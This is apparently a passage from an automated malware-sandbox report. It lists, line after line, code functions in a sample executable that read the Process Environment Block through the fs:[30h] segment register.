                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151E1D0 mov eax, dword ptr fs:[00000030h]11_2_0151E1D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015661C3 mov eax, dword ptr fs:[00000030h]11_2_015661C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015661C3 mov eax, dword ptr fs:[00000030h]11_2_015661C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015761E5 mov eax, dword ptr fs:[00000030h]11_2_015761E5
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D01F8 mov eax, dword ptr fs:[00000030h]11_2_014D01F8
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E0185 mov eax, dword ptr fs:[00000030h]11_2_014E0185
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152019F mov eax, dword ptr fs:[00000030h]11_2_0152019F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152019F mov eax, dword ptr fs:[00000030h]11_2_0152019F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152019F mov eax, dword ptr fs:[00000030h]11_2_0152019F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152019F mov eax, dword ptr fs:[00000030h]11_2_0152019F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01544180 mov eax, dword ptr fs:[00000030h]11_2_01544180
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01544180 mov eax, dword ptr fs:[00000030h]11_2_01544180
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155C188 mov eax, dword ptr fs:[00000030h]11_2_0155C188
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155C188 mov eax, dword ptr fs:[00000030h]11_2_0155C188
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149A197 mov eax, dword ptr fs:[00000030h]11_2_0149A197
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149A197 mov eax, dword ptr fs:[00000030h]11_2_0149A197
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149A197 mov eax, dword ptr fs:[00000030h]11_2_0149A197
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526050 mov eax, dword ptr fs:[00000030h]11_2_01526050
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A2050 mov eax, dword ptr fs:[00000030h]11_2_014A2050
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CC073 mov eax, dword ptr fs:[00000030h]11_2_014CC073
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01524000 mov ecx, dword ptr fs:[00000030h]11_2_01524000
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01542000 mov eax, dword ptr fs:[00000030h]11_2_01542000
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01542000 mov eax, dword ptr fs:[00000030h]11_2_01542000
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01542000 mov eax, dword ptr fs:[00000030h]11_2_01542000
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01542000 mov eax, dword ptr fs:[00000030h]11_2_01542000
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01542000 mov eax, dword ptr fs:[00000030h]11_2_01542000
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01542000 mov eax, dword ptr fs:[00000030h]11_2_01542000
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01542000 mov eax, dword ptr fs:[00000030h]11_2_01542000
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01542000 mov eax, dword ptr fs:[00000030h]11_2_01542000
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE016 mov eax, dword ptr fs:[00000030h]11_2_014BE016
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE016 mov eax, dword ptr fs:[00000030h]11_2_014BE016
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE016 mov eax, dword ptr fs:[00000030h]11_2_014BE016
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE016 mov eax, dword ptr fs:[00000030h]11_2_014BE016
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01536030 mov eax, dword ptr fs:[00000030h]11_2_01536030
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149A020 mov eax, dword ptr fs:[00000030h]11_2_0149A020
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149C020 mov eax, dword ptr fs:[00000030h]11_2_0149C020
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015220DE mov eax, dword ptr fs:[00000030h]11_2_015220DE
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A80E9 mov eax, dword ptr fs:[00000030h]11_2_014A80E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149A0E3 mov ecx, dword ptr fs:[00000030h]11_2_0149A0E3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015260E0 mov eax, dword ptr fs:[00000030h]11_2_015260E0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149C0F0 mov eax, dword ptr fs:[00000030h]11_2_0149C0F0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E20F0 mov ecx, dword ptr fs:[00000030h]11_2_014E20F0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A208A mov eax, dword ptr fs:[00000030h]11_2_014A208A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015660B8 mov eax, dword ptr fs:[00000030h]11_2_015660B8
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015660B8 mov ecx, dword ptr fs:[00000030h]11_2_015660B8
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015380A8 mov eax, dword ptr fs:[00000030h]11_2_015380A8
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156A352 mov eax, dword ptr fs:[00000030h]11_2_0156A352
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01548350 mov ecx, dword ptr fs:[00000030h]11_2_01548350
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152035C mov eax, dword ptr fs:[00000030h]11_2_0152035C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152035C mov eax, dword ptr fs:[00000030h]11_2_0152035C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152035C mov eax, dword ptr fs:[00000030h]11_2_0152035C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152035C mov ecx, dword ptr fs:[00000030h]11_2_0152035C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152035C mov eax, dword ptr fs:[00000030h]11_2_0152035C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152035C mov eax, dword ptr fs:[00000030h]11_2_0152035C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01522349 mov eax, dword ptr fs:[00000030h]11_2_01522349
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154437C mov eax, dword ptr fs:[00000030h]11_2_0154437C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA30B mov eax, dword ptr fs:[00000030h]11_2_014DA30B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA30B mov eax, dword ptr fs:[00000030h]11_2_014DA30B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA30B mov eax, dword ptr fs:[00000030h]11_2_014DA30B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149C310 mov ecx, dword ptr fs:[00000030h]11_2_0149C310
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C0310 mov ecx, dword ptr fs:[00000030h]11_2_014C0310
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015443D4 mov eax, dword ptr fs:[00000030h]11_2_015443D4
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015443D4 mov eax, dword ptr fs:[00000030h]11_2_015443D4
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA3C0 mov eax, dword ptr fs:[00000030h]11_2_014AA3C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA3C0 mov eax, dword ptr fs:[00000030h]11_2_014AA3C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA3C0 mov eax, dword ptr fs:[00000030h]11_2_014AA3C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA3C0 mov eax, dword ptr fs:[00000030h]11_2_014AA3C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA3C0 mov eax, dword ptr fs:[00000030h]11_2_014AA3C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA3C0 mov eax, dword ptr fs:[00000030h]11_2_014AA3C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A83C0 mov eax, dword ptr fs:[00000030h]11_2_014A83C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A83C0 mov eax, dword ptr fs:[00000030h]11_2_014A83C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A83C0 mov eax, dword ptr fs:[00000030h]11_2_014A83C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A83C0 mov eax, dword ptr fs:[00000030h]11_2_014A83C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E3DB mov eax, dword ptr fs:[00000030h]11_2_0154E3DB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E3DB mov eax, dword ptr fs:[00000030h]11_2_0154E3DB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E3DB mov ecx, dword ptr fs:[00000030h]11_2_0154E3DB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E3DB mov eax, dword ptr fs:[00000030h]11_2_0154E3DB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015263C0 mov eax, dword ptr fs:[00000030h]11_2_015263C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155C3CD mov eax, dword ptr fs:[00000030h]11_2_0155C3CD
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D63FF mov eax, dword ptr fs:[00000030h]11_2_014D63FF
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE3F0 mov eax, dword ptr fs:[00000030h]11_2_014BE3F0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE3F0 mov eax, dword ptr fs:[00000030h]11_2_014BE3F0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE3F0 mov eax, dword ptr fs:[00000030h]11_2_014BE3F0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E388 mov eax, dword ptr fs:[00000030h]11_2_0149E388
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E388 mov eax, dword ptr fs:[00000030h]11_2_0149E388
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E388 mov eax, dword ptr fs:[00000030h]11_2_0149E388
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C438F mov eax, dword ptr fs:[00000030h]11_2_014C438F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C438F mov eax, dword ptr fs:[00000030h]11_2_014C438F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01498397 mov eax, dword ptr fs:[00000030h]11_2_01498397
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01498397 mov eax, dword ptr fs:[00000030h]11_2_01498397
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01498397 mov eax, dword ptr fs:[00000030h]11_2_01498397
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155A250 mov eax, dword ptr fs:[00000030h]11_2_0155A250
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155A250 mov eax, dword ptr fs:[00000030h]11_2_0155A250
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01528243 mov eax, dword ptr fs:[00000030h]11_2_01528243
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01528243 mov ecx, dword ptr fs:[00000030h]11_2_01528243
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A6259 mov eax, dword ptr fs:[00000030h]11_2_014A6259
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149A250 mov eax, dword ptr fs:[00000030h]11_2_0149A250
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149826B mov eax, dword ptr fs:[00000030h]11_2_0149826B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A4260 mov eax, dword ptr fs:[00000030h]11_2_014A4260
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A4260 mov eax, dword ptr fs:[00000030h]11_2_014A4260
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A4260 mov eax, dword ptr fs:[00000030h]11_2_014A4260
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149823B mov eax, dword ptr fs:[00000030h]11_2_0149823B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA2C3 mov eax, dword ptr fs:[00000030h]11_2_014AA2C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA2C3 mov eax, dword ptr fs:[00000030h]11_2_014AA2C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA2C3 mov eax, dword ptr fs:[00000030h]11_2_014AA2C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA2C3 mov eax, dword ptr fs:[00000030h]11_2_014AA2C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA2C3 mov eax, dword ptr fs:[00000030h]11_2_014AA2C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B02E1 mov eax, dword ptr fs:[00000030h]11_2_014B02E1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B02E1 mov eax, dword ptr fs:[00000030h]11_2_014B02E1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B02E1 mov eax, dword ptr fs:[00000030h]11_2_014B02E1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE284 mov eax, dword ptr fs:[00000030h]11_2_014DE284
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE284 mov eax, dword ptr fs:[00000030h]11_2_014DE284
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01520283 mov eax, dword ptr fs:[00000030h]11_2_01520283
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01520283 mov eax, dword ptr fs:[00000030h]11_2_01520283
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01520283 mov eax, dword ptr fs:[00000030h]11_2_01520283
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B02A0 mov eax, dword ptr fs:[00000030h]11_2_014B02A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B02A0 mov eax, dword ptr fs:[00000030h]11_2_014B02A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov eax, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov ecx, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov eax, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov eax, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov eax, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov eax, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8550 mov eax, dword ptr fs:[00000030h]11_2_014A8550
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8550 mov eax, dword ptr fs:[00000030h]11_2_014A8550
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D656A mov eax, dword ptr fs:[00000030h]11_2_014D656A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D656A mov eax, dword ptr fs:[00000030h]11_2_014D656A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D656A mov eax, dword ptr fs:[00000030h]11_2_014D656A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01536500 mov eax, dword ptr fs:[00000030h]11_2_01536500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE53E mov eax, dword ptr fs:[00000030h]11_2_014CE53E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE53E mov eax, dword ptr fs:[00000030h]11_2_014CE53E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE53E mov eax, dword ptr fs:[00000030h]11_2_014CE53E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE53E mov eax, dword ptr fs:[00000030h]11_2_014CE53E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE53E mov eax, dword ptr fs:[00000030h]11_2_014CE53E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE5CF mov eax, dword ptr fs:[00000030h]11_2_014DE5CF
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE5CF mov eax, dword ptr fs:[00000030h]11_2_014DE5CF
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A65D0 mov eax, dword ptr fs:[00000030h]11_2_014A65D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA5D0 mov eax, dword ptr fs:[00000030h]11_2_014DA5D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA5D0 mov eax, dword ptr fs:[00000030h]11_2_014DA5D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC5ED mov eax, dword ptr fs:[00000030h]11_2_014DC5ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC5ED mov eax, dword ptr fs:[00000030h]11_2_014DC5ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A25E0 mov eax, dword ptr fs:[00000030h]11_2_014A25E0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D4588 mov eax, dword ptr fs:[00000030h]11_2_014D4588
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A2582 mov eax, dword ptr fs:[00000030h]11_2_014A2582
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A2582 mov ecx, dword ptr fs:[00000030h]11_2_014A2582
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE59C mov eax, dword ptr fs:[00000030h]11_2_014DE59C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015205A7 mov eax, dword ptr fs:[00000030h]11_2_015205A7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015205A7 mov eax, dword ptr fs:[00000030h]11_2_015205A7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015205A7 mov eax, dword ptr fs:[00000030h]11_2_015205A7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C45B1 mov eax, dword ptr fs:[00000030h]11_2_014C45B1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C45B1 mov eax, dword ptr fs:[00000030h]11_2_014C45B1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155A456 mov eax, dword ptr fs:[00000030h]11_2_0155A456
